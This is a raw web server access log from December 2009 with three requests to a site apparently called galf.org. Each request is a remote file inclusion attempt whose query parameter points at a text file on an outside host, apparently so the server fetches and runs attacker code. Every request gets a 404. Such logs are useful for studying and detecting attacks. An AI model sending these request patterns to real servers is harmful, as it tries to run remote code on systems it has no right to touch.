90.182.36.30 - - [20/Dec/2009:23:54:01 -0800] "GET /logs/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:01 -0800] "GET /logs/access_090921.log%20%20/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:54:34 -0800] "GET /logs/access_090706.log//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
